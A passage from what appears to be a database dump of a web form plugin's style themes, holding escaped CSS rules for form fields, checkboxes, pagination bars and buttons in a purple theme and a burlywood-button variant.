no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 0px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	position: absolute;\r\n	border-radius: 0px;\r\n	height: 23px;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	}\r\n.file-picker {\r\n	width: 71px;\r\n	height: 32px;\r\n	background: url([SITE_ROOT]/images/07/upload.png);\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 32px;\r\n	background:url([SITE_ROOT]/images/07/next.png) no-repeat right #33016B;\r\n	padding: 0px 36px 0 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 32px;\r\n	background:url([SITE_ROOT]/images/07/previous.png) no-repeat left #F0EFEF;\r\n	padding: 0 20px 0 36px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	border-right: 1px solid #CECECE;\r\n}\r\n.button-submit {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #33016B;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n	border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.button-reset {\r\n	color: #787878;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #F0EFEF;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n	float: right;\r\n	border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.wdform_page {\r\n	background: #FFFFFF;\r\n	padding-top: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 50px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_section_break2 {\r\n	color: #33016B;\r\n	display: inline-block;\r\n	text-align: left;\r\n	font-size: 20px;\r\nmargin: 16px 0px;\r\n}\r\n\r\n.wdform_section_break {\r\n	color: #33016B;\r\n	font-size: 20px;\r\nmargin: 16px 0px;\r\n\r\n}\r\n.wdform_section {\r\n	display: inline-block;\r\n}\r\nselect {\r\n	border-radius: 0px;\r\n	height: 24px;\r\n	overflow: hidden;\r\n	padding: 2px;\r\nbackground: #F1F1F1;\r\nborder: 1px solid transparent;\r\ncolor: #696969;\r\n	outline: none;\r\n}\r\ninput[type=\"text\"] {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F1F1F1;\r\n	border: 1px solid transparent;\r\ncolor: #696969;\r\n}\r\ninput[type=\"password\"] {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F1F1F1;\r\n	border: 1px solid transparent;\r\ncolor: #696969;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F1F1F1;\r\n	border: 1px solid transparent;\r\ncolor: #696969;\r\n}\r\ninput[type=\"text\"]:focus{\r\n	outline: none;\r\n}\r\ninput[type=\"password\"]:focus{\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: \" \";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/03/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 1px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/03/date.png) no-repeat !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 22px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n	top: 2px;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: \" \";\r\n	position: absolute;\r\n	width: 9px;\r\n	height: 8px;\r\n	background: #A7A7A7;\r\n	border-radius: 0px;\r\n	top: 2px;\r\n	left: 2px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: \"Lucida Grande\", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #A8A8A8;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 0px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	color: #33016B;\r\n	background-color: #ECEBEB;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding-top: 5px;\r\n	padding: 5px 25px 0px 25px;\r\n	font-size: 12px;\r\n}\r\n.page_active {\r\n	color: #fff;\r\n	cursor: pointer;\r\n	background-color: #33016B;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 25px;\r\n	text-align: center;\r\n	font-size: 16px;\r\n	padding: 5px 30px 0px 30px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 18px;\r\n	line-height: 18px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	background: #33016A ; /* Old browsers */\r\n	background: -moz-linear-gradient(left, #33016B 0%, #320169 39%, #33016A 100%); /* FF3.6+ */\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0%, #33016B ), color-stop(39%, #320169 ), color-stop(100%, #33016A )); /* Chrome,Safari4+ */\r\n	background: -webkit-linear-gradient(left, #33016B 0%, #320169 39%, #33016A 100%); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(left, #33016B 0%, #320169 39%, #33016A 100%); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(left, #33016B 0%, #320169 39%, #33016A 100%); /* IE10+ */\r\nbackground: linear-gradient(to right, #33016B 0%, #320169 39%, #33016A 100%);\r\n	vertical-align: middle;\r\n}\r\n.page_percentage_deactive {\r\n	height: 18px;\r\n	line-height: 20px;\r\n	background-color: #EBEAEA;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: center!important;\r\n	margin-bottom: 0px;\r\n}\r\n.wdform_page_navigation:after {\r\n	content: \" \";\r\n	display: block;\r\n	height: 9px;\r\n	background: url([SITE_ROOT]/images/07/0.png) no-repeat;\r\n	position: relative;\r\n	background-size: cover;\r\n	top: -9px;\r\n}\r\n.wdform_percentage_text {\r\n	margin-right:9px;\r\n	color: #FFFFFF;\r\n	font-weight: normal;\r\n	font-size: 13px;\r\n	position: relative;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 20px;\r\n	height: 20px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #4D792C;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 31px;\r\n	color: #fff;\r\n	border: 2px solid #68943B;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\r\n',0),(27,'Theme 07 transparent (burlywood button)','.radio-div input[type=\"radio\"],\r\n.checkbox-div input[type=\"checkbox\"]\r\n{\r\nvisibility: hidden;\r\n}\r\n.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #F0EFEF;\r\nborder: 1px solid #E6C18B;\r\nmargin-bottom: 10px;\r\ncolor: #E6C18B;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-slider-handle {\r\n	width: 16px;\r\n	height: 16px;\r\n	top: -6px;\r\n	border: 0px;\r\n	border-radius: 13px;\r\n	background: #A4A4A4;\r\n	border: 1px solid #fff;\r\n	outline: none;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #F1F1F1 !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type=\"text\"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n	color: #696969;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 0px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover{\r\n	background: #E6C18B !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:active{\r\n	background: #E6C18B !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:focus{\r\n	background: #E6C18B !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:hover{\r\n	background: #E6C18B !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:active{\r\n	background: #E6C18B !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:focus{\r\n	background: #E6C18B !important;\r\n	color: #fff;\r\n}\r\nui-state-hover {\r\n	background: #E6C18B !important;\r\n	color: #fff;\r\n}\r\n.ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #ccc !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #fff;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 0px;\r\n	padding: 0px 0px 0px 2px;\r\n	font-size: 13px;\r\n	height: 22px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #F1F1F1;\r\n	border: 0px solid #ccc;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 23px;\r\n	width: 30px;\r\n	background: url([SITE_ROOT]/images/07/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 0px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	position: absolute;\r\n	border-radius: 0px;\r\n	height: 23px;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	}\r\n.file-picker {\r\n	width: 71px;\r\n	height: 32px;\r\n	background: url([SITE_ROOT]/images/07/upload.png);\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 32px;\r\n	background:url([SITE_ROOT]/images/07/next.png) no-repeat right #E6C18B;\r\n	padding: 0px 36px 0 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 32px;\r\n	background:url([SITE_ROOT]/images/07/previous.png) no-repeat left #F0EFEF;\r\n	padding: 0 20px 0 36px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	border-right: 1px solid #CECECE;\r\n} \r\n.button-submit {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #E6C18B;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n	border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.button-reset {\r\n	color: #787878;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #F0EFEF;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n	float: right;\r\n	border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.wdform_page {\r\n	background: transparent;\r\n	padding-top: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 50px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_section_break2 {\r\n	color: #267EA9;\r\n	display: inline-block;\r\n	text-align: left;\r\n	font-size: 20px;\r\nmargin: 16px 0px;\r\n}\r\n\r\n.wdform_section_break {\r\n	color: #267EA9;\r\n	font-size: 20px;\r\nmargin: 16px 0px;\r\n\r\n}\r\n.wdform_section {\r\n	display: inline-block;\r\n}\r\nselect {\r\n	border-radius: 0px;\r\n	height: 24px;\r\n	overflow: hidden;\r\n	padding: 2px;\r\nbackground: #F1F1F1;\r\nborder: 1px solid transparent;\r\ncolor: #696969;\r\n	outline: none;\r\n}\r\ninput[type=\"text\"] {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F1F1F1;\r\n	border: 1px solid transparent;\r\ncolor: #696969;\r\n}\r\ninput[type=\"password\"] {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F1F1F1;\r\n	border: 1px solid transparent;\r\ncolor: #696969;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F1F1F1;\r\n	border: 1px solid transparent;\r\ncolor: #696969;\r\n}\r\ninput[type=\"text\"]:focus{\r\n	outline: none;\r\n}\r\ninput[type=\"password\"]:focus{\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: \" \";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/03/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 1px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/03/date.png) no-repeat !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 22px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n	top: 2px;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: \" \";\r\n	position: absolute;\r\n	width: 9px;\r\n	height: 8px;\r\n	background: #A7A7A7;\r\n	border-radius: 0px;\r\n	top: 2px;\r\n	left: 2px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 